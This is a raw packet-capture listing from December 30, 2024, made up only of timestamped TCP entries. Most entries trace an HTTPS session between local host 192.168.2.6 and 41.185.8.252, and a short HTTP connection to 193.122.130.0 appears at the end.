                                                                                                                            Dec 30, 2024 11:46:58.401454926 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.401463985 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.401519060 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.401532888 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.401575089 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.402134895 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.402179956 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.402209997 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.402216911 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.402246952 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.402264118 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.403636932 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.403697014 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.403717041 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.403724909 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.403774023 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.403793097 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.429127932 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.429181099 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.429230928 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.429263115 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.429280996 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.429316998 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.612780094 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.612831116 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.612880945 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.612910986 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.612961054 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.612970114 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.613470078 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.613512039 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.613553047 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.613559961 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.613575935 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.613605022 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.613611937 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.614363909 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.614412069 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.614429951 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.614439011 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.614470005 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.615201950 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.615241051 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.615278959 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.615287066 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.615319014 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.616133928 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.616180897 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.616204977 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.616213083 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.616255999 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.617849112 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.617887974 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.617928982 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.617937088 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.617965937 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.640647888 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.640676022 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.640721083 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.640738010 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.640760899 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.691941977 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.701040030 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.701092005 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.701129913 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.701142073 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.701176882 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.701195002 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.824542999 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.824593067 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.824654102 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.824680090 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.824693918 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.824726105 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.824845076 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.824887991 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.824924946 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.824932098 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.824955940 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.824971914 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.825328112 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.825368881 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.825398922 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.825406075 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.825444937 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.825475931 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.825737953 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.825782061 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.825819969 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.825826883 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.825845003 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.825865030 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.826292992 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.826338053 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.826373100 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.826379061 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.826406002 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.826421022 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.826601028 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.826642036 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.826673985 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.826679945 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.826709032 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.826716900 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.826972008 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.827012062 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.827058077 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.827064037 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.827088118 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.827097893 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.827645063 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.827698946 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.827738047 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.827745914 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.827764034 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.827789068 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.912970066 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.913018942 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.913058043 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.913074017 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.913115025 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.913125038 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.913150072 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.913194895 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.913218975 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.913225889 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.913252115 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.913268089 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.913510084 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.913551092 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.913582087 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.913589001 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.913620949 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.913633108 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.913897991 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.913938999 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.913966894 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.913974047 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.913995028 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.914015055 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.914485931 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.914529085 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.914552927 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.914560080 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.914582968 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.914594889 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.914669037 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.914710045 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.914736986 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.914743900 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.914768934 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.914783955 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.915096045 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.915138960 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.915174007 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.915179968 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.915205956 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.915215015 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.915555000 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.915601969 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.915628910 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.915638924 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:58.915661097 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:58.915676117 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.035974026 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.036031008 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.036084890 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.036134005 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.036153078 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.036180973 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.036557913 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.036600113 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.036631107 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.036638975 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.036660910 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.036681890 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.036844969 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.036885977 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.036926985 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.036933899 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.036959887 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.036973953 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.037038088 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.037081957 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.037097931 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.037106991 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.037132025 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.037152052 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.037637949 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.037678957 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.037712097 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.037719011 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.037731886 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.037760973 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.038043022 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.038085938 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.038117886 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.038125038 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.038150072 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.038167000 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.038547993 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.038600922 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.038625002 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.038633108 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.038662910 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.038674116 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.039014101 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.039056063 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.039087057 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.039093971 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.039119005 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.039134979 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.124115944 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.124166012 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.124233961 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.124269962 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.124289036 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.124310970 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.124663115 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.124738932 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.124846935 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.124922991 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.125011921 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.125051022 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.125077963 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.125086069 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.125099897 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.125128031 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.125355959 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.125396967 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.125431061 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.125437975 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.125451088 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.125472069 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.125813961 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.125884056 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.125904083 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.125973940 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.126363993 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.126405954 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.126431942 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.126439095 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.126456976 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.126472950 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.126629114 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.126673937 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.126708031 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.126714945 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.126737118 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.126745939 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.127118111 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.127159119 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.127185106 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.127192020 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.127217054 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.127233982 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.247533083 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.247560024 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.247626066 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.247658968 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.247699976 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.247960091 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.247977018 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.248032093 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.248039961 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.248079062 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.248222113 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.248239994 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.248290062 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.248296976 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.248358965 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.248538017 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.248553991 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.248603106 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.248610973 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.248661995 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.248961926 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.248977900 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.249027014 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.249034882 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.249058008 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.249072075 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.249223948 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.249239922 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.249322891 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.249331951 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.249368906 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.249660015 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.249675989 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.249792099 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.249799013 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.249844074 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.249998093 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.250013113 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.250065088 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.250072956 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.250116110 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.340374947 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.340400934 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.340440035 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.340476036 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.340511084 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.340528011 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.340528011 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.340575933 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.342758894 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.342789888 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:46:59.342803955 CET49712443192.168.2.641.185.8.252
                                                                                                                            Dec 30, 2024 11:46:59.342812061 CET4434971241.185.8.252192.168.2.6
                                                                                                                            Dec 30, 2024 11:47:04.195811987 CET4972080192.168.2.6193.122.130.0
                                                                                                                            Dec 30, 2024 11:47:04.200601101 CET8049720193.122.130.0192.168.2.6
                                                                                                                            Dec 30, 2024 11:47:04.200700045 CET4972080192.168.2.6193.122.130.0
                                                                                                                            Dec 30, 2024 11:47:04.201746941 CET4972080192.168.2.6193.122.130.0
                                                                                                                            Dec 30, 2024 11:47:04.206542015 CET8049720193.122.130.0192.168.2.6
                                                                                                                            Dec 30, 2024 11:47:04.667391062 CET8049720193.122.130.0192.168.2.6
